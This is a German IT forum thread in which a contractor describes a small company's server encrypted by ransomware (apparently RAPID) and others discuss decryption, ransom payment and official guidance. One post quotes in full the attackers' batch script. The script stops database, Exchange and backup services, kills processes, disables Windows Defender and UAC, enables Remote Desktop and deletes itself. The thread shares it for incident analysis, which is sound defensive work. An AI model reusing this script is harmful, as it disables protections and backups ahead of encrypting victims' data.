Jump to content

Ransomware - Server verschlüsselt


Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Empfohlene Beiträge

Hallo Leute,

 

ich kann das Jahr gleich mit einer kleinen Herausforderung anfangen.

 

Am 31.12. wurde ich von einem Neukunden angerufen, dass sein Server verschlüsselt ist ...

 

Wie sich herrausstellte - absoluter worst case ... alles was man nicht machen sollte liegt hier vor ...

 

Kleine Firma, die mit - festhalten - Windows 2011 HomeServer (EOL 2016) arbeitet

Backup des ERP Systems liegt nur auf dem Server (auf nem 2. Raid1)

Virenschutz ... irgend ein ComodoAV ... uralt von 2013 ...

H-Mailserver mit Mailstore Home (nicht revisionssicher und für betriebliche Nutzung lizenzrechtlich nicht erlaubt)

 

Es gibt kein Backup, auch kein Teilbackup. Die verschlüsselten Dateien weisen die Endung .cryptolocker auf. Laut NoRansomwareProjekt würde das auf CryptXXX V1-V3 hinweisen ... Das Entschlüsselungstool von Trendmicro versagt allerdings

 

der Erpressertext lautet:

 

Zitat

Welcome.

All files on your network have been encrypted. 
Backups were also encrypted or deleted.

This process hasnt corrupted your files, it just modified them. Please note that this modification is reversible.
...........

 

 

Glück im Unglück ... es scheint, dass die SQL DB des ERP Programms nicht verschlüsselt ist ... und dass die bis 7.1. Werksurlaub haben ...

 

ich werd die Kiste jetzt erst mal abgesichert hochfahren und die Ransomware beseitigen ... 

 

Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ...

 

 

hat jemand nen Tipp für eine etwaige Entschlüsselung ... ich jeweils einer der Raid1 Platten mittels einer Diskstation auf zwei Platten von mir geklont - damit kann ich dann gefahrlos testen ...

 

Auf alle Fälle erstell ich dem Kunden dann mal ein richtiges IT Konzept und Angebot mit aktueller Hardware, Software, Virenschutz und Backup! 

Die Firma, die das vorher eingerichtet hat - hat schlicht und ergreifend grob fahrlässig gehandelt ... vom lizenzrechtlichen Dingen will ich mal gar nicht erst reden!  ich schüttel immer noch innerlich den Kopf

 

Link zu diesem Kommentar
vor 1 Stunde schrieb Squire:

der Erpressertext lautet:

Vielleicht wäre es gut, wenn die Erpresser-Links nicht in einer Nachricht vorhanden sind ;-) Für Kriminelle brauchen wir ja keine Werbung machen.

 

vor 5 Minuten schrieb MrCocktail:

2 Fällen haben es Kunden von einem Bekannten getan

Ohne die Umstände zu kennen, halte ich das vorgehen für äußerst kritisch. In der Masse lohnt sich das dann für die Erpresser und es wird immer so weitergehen.

Link zu diesem Kommentar

Incident Management ... der war gut :D das bin ich dann wohl selbst

 

ich hab vorhin noch mal andere Dateien gecheckt ... CryptoXXX scheint es nicht zu sein ... da findet kein Decryptor irgendwas ...

Emisoft wirft als Ransomware RAPID aus - dafür gibt es keinen decryptor. 

 

was ich bisher gefunden hab, wie er sich aktiv setzt ... wie das Teil reingekommen ist ist mir noch unklar - der Kunde behauptet nix geklickt zu haben ...

 

ich hab folgende Datei im Download des Admins unter einem Verzeichnis RRR gefunden - die Exes hat er wohl mit einem AV Scan geschreddert

 

del.bat 

 

@echo off
START "" %~dp0\RRLL.exe -all
START "" %~dp0\NS.exe
START "" %~dp0\p.exe

net stop MSSQLServerADHelper100
net stop MSSQL$ISARS
net stop MSSQL$MSFW
net stop SQLAgent$ISARS
net stop SQLAgent$MSFW
net stop SQLBrowser
net stop ReportServer$ISARS
net stop SQLWriter
net stop WinDefend
net stop mr2kserv
net stop MSExchangeADTopology
net stop MSExchangeFBA
net stop MSExchangeIS
net stop MSExchangeSA
net stop ShadowProtectSvc
net stop SPAdminV4
net stop SPTimerV4
net stop SPTraceV4
net stop SPUserCodeV4
net stop SPWriterV4
net stop SPSearch4
net stop MSSQLServerADHelper100
net stop IISADMIN
net stop firebirdguardiandefaultinstance
net stop ibmiasrw
net stop QBCFMonitorService
net stop QBVSS
net stop QBPOSDBServiceV12
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
net stop IISADMIN
net stop "Simply Accounting Database Connection Manager"
net stop QuickBooksDB1
net stop QuickBooksDB2
net stop QuickBooksDB3
net stop QuickBooksDB4
net stop QuickBooksDB5
net stop QuickBooksDB6
net stop QuickBooksDB7
net stop QuickBooksDB8
net stop QuickBooksDB9
net stop QuickBooksDB10
net stop QuickBooksDB11
net stop QuickBooksDB12
net stop QuickBooksDB13
net stop QuickBooksDB14
net stop QuickBooksDB15
net stop QuickBooksDB16
net stop QuickBooksDB17
net stop QuickBooksDB18
net stop QuickBooksDB19
net stop QuickBooksDB20
net stop QuickBooksDB21
net stop QuickBooksDB22
net stop QuickBooksDB23
net stop QuickBooksDB24
net stop QuickBooksDB25
taskkill /f /im mysql*
taskkill /f /im IBM*
taskkill /f /im bes10*
taskkill /f /im black*
taskkill /f /im sql
taskkill /f /im store.exe
taskkill /f /im sql*
taskkill /f /im vee*
taskkill /f /im postg*
taskkill /f /im sage*
REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
del %0

 

bearbeitet von Squire
Link zu diesem Kommentar

Ich würde mir keine großen Hoffnungen mehr machen die Daten irgendwie entschlüsselt zu bekommen.
Meistens hat man noch eine Chance solange der Server/Rechner nicht heruntergefahren wurde, da viele Ransomwares den Key im RAM nicht clearen.
 

Aus betriebswirtschaftlicher Sicht muss man in so einer Situation den Punkt ganz klar überdenken.

vor 4 Stunden schrieb Squire:

Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ...

 

Der Kunde hat seine IT über Jahre wohl total vernachlässigt und steht jetzt mit heruntergelassenen Hosen da, selber schuld.

Link zu diesem Kommentar
vor 9 Minuten schrieb MurdocX:
vor 11 Minuten schrieb DocData:

Joar, Insolvenz anmelden wäre mal eine Maßnahme.

Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme :D

Deswegen hat er ja auch geschrieben Insolvenz anmelden (da die Wiederherstellung sehr sehr unwahrscheinlich ist) ODER bezahlen ;)

 

 

Hier noch ein Leitfaden des BSI zum Thema Ransomware:
https://www.bsi.bund.de/DE/Themen/Cyber-Sicherheit/Empfehlungen/Ransomware/Ransomware_node.html

 

Hier noch 2 Links die helfen könnten:
https://www.nomoreransom.org/de/index.html

https://id-ransomware.malwarehunterteam.com/

bearbeitet von falkebo
Link zu diesem Kommentar

No More Ransomware kannte ich schon ...

 

image.thumb.png.5833897a0332c762aa3ef4d4a4c2a4b1.png

 

zumindest scheint die SQL DB nicht verschlüsselt zu sein ... normales MDF File.

 

Was mich jetzt ein wenig wundert ist, dass ich keinen aktiven Trojaner etc. finde ... nix in den Autorun Schlüsseln etc ...

Kann das sein, dass die sich nach erfolgreichen Verschlüsseln selbst wieder rauskicken?

 

Vielleicht ist noch was mit einem SystemRestore Point was zu holen ... ich hatte vorhin den Kunden schon mal telefonisch informiert, dass es dunkel ausschaut ...

Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€

Link zu diesem Kommentar

Hi,

 

auch wenn es jetzt b***d klingt, hast du dir die Seite im TOR Browser mal angeschaut?

Meist ist da auch noch ein Link zu Hilfe, und ja, solange die Software wirklich aktiv ist und nicht nur noch Reste durch Zufall durchs Web gehen, entschlüsseln die wirklich und leisten im Zweifel sogar einen nicht so schlechten Support, ob man so etwas jetzt unterstützen will / muss / kann ist dann noch eine andere frage.

Link zu diesem Kommentar

das muss der Kunde entscheiden, ob er zahlt oder nicht. Ich bin in diesem Fall externer Dienstleister und hab den Kunden vorher auch nicht betreut ... Ich war am 31.12. zum ersten mal bei ihm ...

so wie es ausschaut, hört er auf die Polizei und will nicht zahlen ...

 

Anscheinend wurde er gehackt. Ich hab im Eventlog wurden RDP Verbindungen von externen IPs gelogged. Laut Kunde ist RDP nach außen aber nicht offen ...

 

bearbeitet von Squire
Link zu diesem Kommentar
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Schreibe einen Kommentar

Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung jetzt entfernen

  Only 75 emoji are allowed.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor-Fenster leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

×
×
  • Neu erstellen...